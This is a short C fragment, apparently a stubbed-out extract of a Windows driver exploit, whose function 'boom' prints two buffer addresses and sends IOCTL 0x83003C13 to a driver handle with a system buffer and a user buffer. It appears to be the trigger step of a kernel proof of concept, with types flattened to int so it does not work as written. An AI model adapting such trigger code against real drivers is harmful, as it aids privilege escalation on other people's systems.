
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int PVOID ;
typedef int DWORD ;


 int DeviceIoControl (int ,int,int ,int,int ,int,int *,int ) ;
 int DriverHandle ;
 int printf (char*,int ) ;

void boom(PVOID systembuffer,PVOID userbuffer)
{
 printf("userbuffer Is:%p\n\n",userbuffer);
 printf("The systembuffer Is:%p\n\n",systembuffer);
 DeviceIoControl(DriverHandle,
 0x83003C13,
 systembuffer,
 20,
 userbuffer,
 20,
 (DWORD *)0,
 0);
 return ;
}
